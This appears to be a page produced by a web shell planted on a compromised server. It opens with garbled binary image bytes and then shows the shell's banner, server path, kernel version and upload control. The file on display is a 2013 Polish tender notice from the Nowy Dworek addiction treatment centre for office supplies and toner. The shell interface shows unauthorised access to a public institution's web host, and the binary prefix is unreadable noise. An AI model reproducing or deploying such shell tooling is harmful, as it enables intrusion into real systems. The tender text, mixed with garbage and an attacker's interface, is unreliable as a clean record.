JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131125/481724-N-2013.html

<p class="kh_header"><b>Nowy Dworek: Dostawa    artykułów biurowych</b><br>
<b>Numer ogłoszenia: 481724 - 2013; data zamieszczenia: 25.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek dla Osób Uzależnionych SPZOZ "Nowy Dworek" , Nowy Dworek 46, 66-200 Nowy Dworek, woj. lubuskie, tel. 68 381 10 91, 68 381 01 67, faks 68 381 01 67 wew. 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowydworek.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa    artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przetarg nieograniczony na dostawę artykułów biurowych

L.p.	Nazwa towaru	Jednostka	Przewidywana ilość zakupu na 2013 rok
1	Papier do drukarek 500 kartek w ryzie, stopień białości:3 gwiazdki, gramatura papieru 80g/m2
	
1 ryza
	(5 ryz w kartonie)
200kartonów
2	Koszulki foliowe A4 do wpięcia do segregatora
	1 opakowanie
(50 szt. w opakowaniu)	50 opakowań
3	Skoroszyt sztywny wpinany A4, z przeźroczystą okładką 

	1 sztuka	60 opakowań (10 szt. w opakowaniu)
4	Skoroszyt sztywny A4, z przeźroczystą okładką, bez możliwości wpięcia do segregatora
	1 sztuka 	60 opakowań (10 szt. w opakowaniu)
5	Spinacze małe 33 mm
	1 pudełeczko	(10 szt. w opakowaniu)  10 opakowań
6	Spinacze duże 70 mm
	1 pudełeczko	12 opakowań (10 szt. w opakowaniu)
7	Koperty C5 (100) samoprzylepne
	1 szt.	3000 sztuk
8	Koperty C4 (100) samoprzylepne
	1 szt.	5000 sztuk
9	Koperty C6(100) samoprzylepne
 	1 szt.	1500 sztuk
10	Koperty DL z okienkiem prawa strona
	1 szt.	5000 sztuk
11	Korektor myszka 
	1 szt.	50sztuk
12	Segregator duży A4 szerokość 5 cm z dziurką na grzbiecie 
	1 szt.	50 sztuk
13
	Zeszyt A4 96 kartkowy, w miękkiej okładce -  kratka
	1 szt.	25sztuk
14	Zeszyt 32 kartkowy A5, w miękkiej okładce -kratka
	1 szt.	50 sztuk
15	Teczka zapinana na zatrzask	1 szt	20 sztuk
16	Zeszyt 60 kartkowy A5, w miękkiej okładce - kratka
	1 szt.	60 sztuk
17	Zeszyt 80 kartkowy A5, w miękkiej okładce- 
kratka	1 szt	30sztuk
18	Teczka wiązana tekturowa
	1 szt.	1000 sztuk
19	Markery 
	1 szt.	50 sztuk
20	Folia kopiująca do faxu  ( Panasonic KX - FT 908 - format RF 216 x 30 lub równoważne
	1 op.	20 opakowań
21	Bloki makulaturowe A5
	1 szt.	50 sztuk
22	Bloki makulaturowe A4
	1 szt.	50sztuk
23	Druki KW ( kolor zielony) kopiujące co najmniej 4 kartki
	1 sztuka tj. bloczek	150 opakowania 
( 5 sztuk w opakowaniu)
24	Druki KP ( kolor czerwony) kopiujące co najmniej 4 kartki

	1 sztuka tj. bloczek	150 opakowania 
( 5 sztuk w opakowaniu)
25	Druki delegacji 	1 sztuka tj. bloczek	50 opakowania 
( 5 sztuk w opakowaniu)
26	Druki: Wnioski o urlop
	1 sztuka tj. bloczek	50 opakowania 
( 5 sztuk w opakowaniu)
27	Zszywki numer 24/6	1 sztuka 	10 opakowań
( 10 szt. w opakowaniu)
28	Zszywki numer 10 mm	1 sztuka 	15 opakowań
( 10 szt. w 
29	Karteczki samoprzylepne kwadratowe małe w kolorze żółtym	1 bloczek	50 opakowań (12 bloczków w opakowaniu)
30	Karteczki białe kwadratowe  w bloczku nieprzylepne	1 bloczek	10 opakowań
31	Tusz do stempli czerwony i czarny 	1 sztuka	15 sztuk
32	Dziennik korespondencyjny w skórzanej oprawie	1 sztuka ( 200 kartkowy)	20 sztuk
33	Taśma klejąca szerokość 2  cm długość 30 m	1 sztuka	50 sztuk
34	Nożyczki 	1 sztuka	10 sztuk
35	Zakreślasz kolorowy, 	1 sztuka	50 sztuk
36	Ołówek - drewniany z gumką	1 sztuka 	50 sztuk
37	Pinezki beczułki 	1 pudełko	10 opakowań
38	Woreczki strunowe 150*250 	1 opak. ( 100 sztuk)	10 opakowań
39	Linijka 30 cm	1 sztuka	10 sztuk
40	Druki : Wniosek o zaliczkę
	1 sztuka tj. bloczek	5 opakowań ( 5 sztuk w opakowaniu)
41	Druki: Nota księgowa	1 sztuka tj. bloczek	2 opakowanie
42	CD RW+	(10 szt. w opakowaniu)	20 opakowań
43	CD DVD	(10 szt w opakowaniu)	10 opakowań
44	Spinacze klipsy  duże - czarna obudowa 	1 opakowanie	5 opakowań
45	Przekładki wąskie do wpięcia do segregatora	1 opakowanie	10 opakowań
46	Blok do Flipcharta 60*90 cm  lub równoważne
	1 opakowanie	15 opakowań
47	Klipsy archiwizacyjne	1 opakowanie( 100 sztuk w opakowaniu)	5 opakowań
48	Fastykuły laminowane	1 opakowanie(10 szt w opakowaniu)	100 opakowań
49	Temperówka pojedyńcza	1 sztuka 	10 sztuk
50
	Pudełka  archiwizacyjne grzbiet 80 mm	1 sztuka	100 sztuk
51	Długopis zwykły	1 sztuka	100 opakowań( 12 sztuk w opakowaniu)
52	Flipchart  Ecopopchart 2010 60*90 cm lakierowany lub równoważne	1 sztuka	5 sztuk
53	Tablica obrotowo jezdna lakierowana 120*150 cm,  2*3 lub równoważne	1 sztuka	5 sztuk
54	Tablica korkowa w ramie aluminiowej Bi-Office kolor brązowy 180*120 cm lub równoważne	1 sztuka	5 sztuk
55	Telefaks na papier termiczny Panasonic KX-FT 988PD-B lub równoważne (pod pojęciem równoważne zamawiający uważa: folię termotransferową, technologia wydruku FAX, wymiary 220mm X 30m, opakowanie: 2 szt.; gwarancja folii 24 m-ce
		1 opakowanie	1 sztuki
56	 Toner HP 12a oryginał lub równoważne (pod pojęciem równoważne zamawiający uważa: toner czarny polimerowy o rozmiarze cząstek 5-6 mikronów pozwalający na uzyskanie wydruków w rozdzielczości 1200 dpi.  Wydajność średnia - 2.000 stron A4 przy 5% pokryciu.)	1 sztuka	80 sztuk
57	Tusz Lexmark F260 D oryginał  lub równoważne(pod pojęciem równoważne zamawiający uważa: toner czarny pozwalający na uzyskanie wydruków w rozdzielczości 1200 dpi.  Wydajność średnia - 3.500 stron A4 przy 5% pokryciu.)	1 sztuka	10 sztuk
58	Toner Konica Minolta BizHub250 oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: toner czarny o wydajności średniej 17000 stron przy 5% pokryciu.)	1 sztuka	15 sztuk 
59	Tusz HP 85A oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: toner czarny polimerowy o rozmiarze cząstek 5-6 mikronów pozwalający na uzyskanie wydruków w rozdzielczości 1200 dpi.  Wydajność średnia - 2.000 stron A4 przy 5% pokryciu.)	1 sztuka	12 sztuk
60	Tusz Brother DCP 135 C oryginał lub równoważne (pod pojęciem równoważne zamawiający uważa: zestaw 4 wkładów z atramentem nowej generacji Innobella, dzięki któremu zdjęcia i wydruki są zabezpieczone przed negatywnym oddziaływaniem światła i ozonu gwarantując im długowieczność bez uszczerbku na ich jakości. Wydajność 1x350 + 3x300 przy 5% pokryciu).	1 sztuka	30 sztuk
61	Tusz HP 336  oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: wkład z atramentem w technologii PhotoREt IV, pozwalający na wydruk w pełni profesjonalnych wydruków foto o wydajności ok. 210 stron przy pokryciu 5%).	1 sztuka	12 sztuk
62	Tusz HP 357  oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: wkład z atramentem w technologii PhotoREt IV, pozwalający na wydruk w pełni profesjonalnych wydruków foto o wydajności ok. 400 stron przy pokryciu 5%).	1 sztuka	12 sztuk
63	Tusz Epson SX 100  oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: komplet 4 tuszy zawierające atrament barwnikowy (Dye-Based) czarny, błękitny, purpurowy, żółty Pojemność: czarny: 7,4ml, cyan/magenta/yellow: 5,5ml, Wydajność: czarny: 470str, cyan: 425str
magenta: 290str, yellow: 370str)	1 sztuka	12 sztuk
65	Tusz Epson SX 420  oryginał lub równoważne
(pod pojęciem równoważne zamawiający uważa: komplet 4 tuszy zawierające atrament barwnikowy (Dye-Based) czarny, błękitny, purpurowy, żółty Pojemność: czarny: 7,4ml, cyan/magenta/yellow: 5,5ml, Wydajność: czarny: 470str, cyan: 425str
magenta: 290str, yellow: 370str)	1 sztuka	12 sztuk
66	Bindownica	1 sztuka	5 sztuk
67	Laminarka	1 sztuka	5 sztuk

Dostawy będą realizowane sukcesywnie, według zamówień częściowych składanych przez Zamawiającego telefonicznie, faxem lub drogą e-mailową  dwa razy w tygodniu, w dniu i o godzinie wskazanej przez Zamawiającego (do godz. 10.00)  z zapewnieniem dostaw priorytetowych tj. zamówienie z dostawą artykułów na dzień następny po jego złożeniu do godz. 8.00. Dostawa artykułów będących przedmiotem umowy będzie dokonywana transportem dostawcy.  Koszt transportu wliczony jest w cenę towaru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany formularz oferty, według wzoru stanowiącego załącznik numer 1 do SIWZ; b) upoważnienie według wzoru stanowiącego załącznik numer 4 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>A. waloryzacja ceny w przypadku ustawowej zmiany stawki VAT dotyczącej przedmiotu          zamówienia,
B. zmiana terminów płatności w przypadku zmian w terminach finansowania świadczeń przez Narodowy Fundusz Zdrowia,
C. zmiana wielkości przedmiotu umowy  nie więcej jednak niż 15 %, w przypadku zmniejszenia kontraktu zawartego z Narodowym Funduszem Zdrowia  i tym samym  zmniejszenia  ilości udzielanych świadczeń .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowydworek.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek dla Osób Uzależnionych Samodzielny Publiczny Zakład Opieki Zdrowotnej
  Nowy Dworek
Nowy Dworek 46
66-200 Świebodzin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 09:30, miejsce: Ośrodek dla Osób Uzależnionych Samodzielny Publiczny Zakład Opieki Zdrowotnej
  Nowy Dworek
Nowy Dworek 46
66-200 Świebodzin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com